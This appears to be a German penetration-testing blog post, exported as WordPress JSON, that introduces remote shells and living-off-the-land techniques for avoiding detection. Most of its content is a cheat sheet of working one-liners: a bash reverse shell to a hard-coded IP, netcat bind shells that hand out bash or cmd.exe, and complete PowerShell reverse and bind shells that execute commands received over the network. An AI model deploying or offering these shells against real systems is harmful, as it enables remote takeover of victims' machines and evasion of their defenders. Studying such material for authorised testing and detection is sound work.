{"id":58,"date":"2023-12-11T12:45:24","date_gmt":"2023-12-11T11:45:24","guid":{"rendered":"https:\/\/corethreat.net\/wordpress\/?p=58"},"modified":"2023-12-11T12:59:00","modified_gmt":"2023-12-11T11:59:00","slug":"remote-shells","status":"publish","type":"post","link":"https:\/\/corethreat.net\/wordpress\/index.php\/2023\/12\/11\/remote-shells\/","title":{"rendered":"Remote-Shells"},"content":{"rendered":"\n<p>Remote Shells sind Tools, die es einem Benutzer erm\u00f6glichen, auf entfernte Systeme zuzugreifen und Befehle auszuf\u00fchren, als w\u00e4re er lokal pr\u00e4sent. Diese sind oft unerl\u00e4sslich f\u00fcr Penetrationstests, bei denen Sicherheitsl\u00fccken in einem System identifiziert werden sollen. Die Auswahl einer geeigneten Remote Shell ist entscheidend, insbesondere wenn man versucht, Detektionen zu minimieren und sich &#8222;off the grid&#8220; zu bewegen.<\/p>\n\n\n\n<p>In diesem Zusammenhang werden oft sogenannte &#8222;Living off the Land&#8220; (LOLBAS &#8211; https:\/\/lolbas-project.github.io\/) Techniken verwendet. Dies bedeutet, dass Angreifer auf bereits auf dem Zielsystem vorhandene Tools und Ressourcen zur\u00fcckgreifen, um ihre Aktionen zu tarnen und Detektionen zu umgehen. Anstatt verd\u00e4chtige Software zu installieren, nutzen sie die vorhandenen Funktionen des Betriebssystems, um ihre Spuren zu verwischen.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"640\" height=\"832\" src=\"https:\/\/corethreat.net\/wordpress\/wp-content\/uploads\/2023\/12\/DreamShaper_v7_red_and_black_style_hacker_on_a_terminal_hoody_2.jpg\" alt=\"\" class=\"wp-image-64\" style=\"width:350px\" srcset=\"https:\/\/corethreat.net\/wordpress\/wp-content\/uploads\/2023\/12\/DreamShaper_v7_red_and_black_style_hacker_on_a_terminal_hoody_2.jpg 640w, https:\/\/corethreat.net\/wordpress\/wp-content\/uploads\/2023\/12\/DreamShaper_v7_red_and_black_style_hacker_on_a_terminal_hoody_2-231x300.jpg 231w\" sizes=\"(max-width: 640px) 100vw, 640px\" \/><\/figure>\n\n\n\n<p>Ein Beispiel f\u00fcr eine Remote Shell, die in LOLBAS-Szenarien verwendet werden kann, ist die Verwendung von PowerShell auf Windows-Systemen. PowerShell ist eine leistungsstarke Skriptsprache, die von Microsoft entwickelt wurde und auf vielen Windows-Rechnern vorinstalliert ist. Angreifer k\u00f6nnen PowerShell verwenden, um Remote-Befehle auszuf\u00fchren, Dateien herunterzuladen oder Systeminformationen abzurufen, ohne zus\u00e4tzliche Software installieren zu m\u00fcssen.<\/p>\n\n\n\n<p>Der Vorteil solcher LOLBAS-Techniken liegt darin, dass sie oft schwerer zu erkennen sind, da sie sich auf bereits vorhandene Ressourcen st\u00fctzen. Die Verwendung von legitimen Systemtools minimiert das Risiko, von Sicherheitsl\u00f6sungen entdeckt zu werden, die auf das Erkennen von b\u00f6sartiger Software abzielen.<\/p>\n\n\n\n<p>F\u00fcr Penetrationstests ist es entscheidend, dass Ethical Hacker und Sicherheitsprofis diese Techniken verstehen und sich ihrer bedienen, um Schwachstellen aufzudecken, ohne dabei unn\u00f6tige Aufmerksamkeit zu erregen. Es unterstreicht auch die Wichtigkeit f\u00fcr Organisationen, nicht nur auf die Erkennung von Malware zu setzen, sondern auch auf die \u00dcberwachung ungew\u00f6hnlicher Aktivit\u00e4ten und Anomalien im Netzwerk, um fortschrittlichere Angriffe zu identifizieren.<\/p>\n\n\n\n<p><strong>Bash-Reverse-Shell (Linux)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>bash -i &gt;&amp; \/dev\/tcp\/10.10.15.13\/8091 0&gt;&amp;1<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>\/bin\/bash -c \u2018bash -i &gt; \/dev\/tcp\/IP\/80 &gt;&amp;1\u2019<\/code><\/pre>\n\n\n\n<p><strong>Netcat-Bind-Shell (Linux \/ Windows)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nc -l -p &#91;port] -e \/bin\/bash\nnc -l -p &#91;port] -e cmd.exe<\/code><\/pre>\n\n\n\n<p><strong>PS-Reverse-Shell (Windows)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('10.11.0.4',443);$stream =\n$client.GetStream();&#91;byte&#91;]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-\nString );$sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = (&#91;text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Leng th);$stream.Flush();}$client.Close()\"\n<\/code><\/pre>\n\n\n\n<p><strong>PS-Bind-Shell (Windows)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>powershell -c \"$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client =\n$listener.AcceptTcpClient();$stream = $client.GetStream();&#91;byte&#91;]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback =\n(iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = (&#91;text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Leng th);$stream.Flush()};$client.Close();$listener.Stop()\"<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Remote Shells sind Tools, die es einem Benutzer erm\u00f6glichen, auf entfernte Systeme zuzugreifen und Befehle auszuf\u00fchren, als w\u00e4re er lokal pr\u00e4sent. Diese sind oft unerl\u00e4sslich f\u00fcr Penetrationstests, bei denen Sicherheitsl\u00fccken in einem System identifiziert werden sollen. Die Auswahl einer geeigneten Remote Shell ist entscheidend, insbesondere wenn man versucht, Detektionen zu minimieren und sich &#8222;off the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/corethreat.net\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/58"}],"collection":[{"href":"https:\/\/corethreat.net\/wordpress\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/corethreat.net\/wordpress\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/corethreat.net\/wordpress\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/corethreat.net\/wordpress\/index.php\/wp-json\/wp\/v2\/comments?post=58"}],"version-history":[{"count":6,"href":"https:\/\/corethreat.net\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/58\/revisions"}],"predecessor-version":[{"id":65,"href":"https:\/\/corethreat.net\/wordpress\/index.php\/wp-json\/wp\/v2\/posts\/58\/revisions\/65"}],"wp:attachment":[{"href":"https:\/\/corethreat.net\/wordpress\/index.php\/wp-json\/wp\/v2\/media?parent=58"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/corethreat.net\/wordpress\/index.php\/wp-json\/wp\/v2\/categories?post=58"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/corethreat.net\/wordpress\/index.php\/wp-json\/wp\/v2\/tags?post=58"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}